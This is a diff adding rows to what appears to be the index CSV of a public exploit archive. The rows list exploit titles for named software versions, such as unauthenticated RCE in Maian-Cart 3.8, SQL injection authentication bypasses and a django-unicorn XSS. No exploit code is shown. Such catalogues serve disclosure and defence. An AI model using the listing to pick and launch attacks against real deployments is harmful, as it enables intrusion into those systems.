 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44502,3 +44503,14 @@ id,file,description,date,author,type,platform,port
 50388,exploits/php/webapps/50388.txt,"Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)",1970-01-01,snup,webapps,php,
 50389,exploits/php/webapps/50389.txt,"Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)",1970-01-01,snup,webapps,php,
 50390,exploits/php/webapps/50390.txt,"Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mevlüt Yılmaz",webapps,php,
+50391,exploits/php/webapps/50391.txt,"IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)",1970-01-01,"Yash Mahajan",webapps,php,
+50392,exploits/php/webapps/50392.txt,"Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)",1970-01-01,snup,webapps,php,
+50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Raven Security Associates",webapps,python,
+50394,exploits/php/webapps/50394.py,"Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,DreyAnd,webapps,php,
+50395,exploits/php/webapps/50395.txt,"WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)",1970-01-01,Lotfi13-DZ,webapps,php,
+50396,exploits/php/webapps/50396.txt,"Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation",1970-01-01,"Amine ismail",webapps,php,
+50397,exploits/php/webapps/50397.txt,"Simple Online College Entrance Exam System 1.0 - Account Takeover",1970-01-01,"Amine ismail",webapps,php,
+50398,exploits/php/webapps/50398.txt,"Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection",1970-01-01,"Amine ismail",webapps,php,
+50399,exploits/php/webapps/50399.txt,"Online Enrollment Management System 1.0 - Authentication Bypass",1970-01-01,"Amine ismail",webapps,php,
+50400,exploits/php/webapps/50400.txt,"Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php,
+50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php,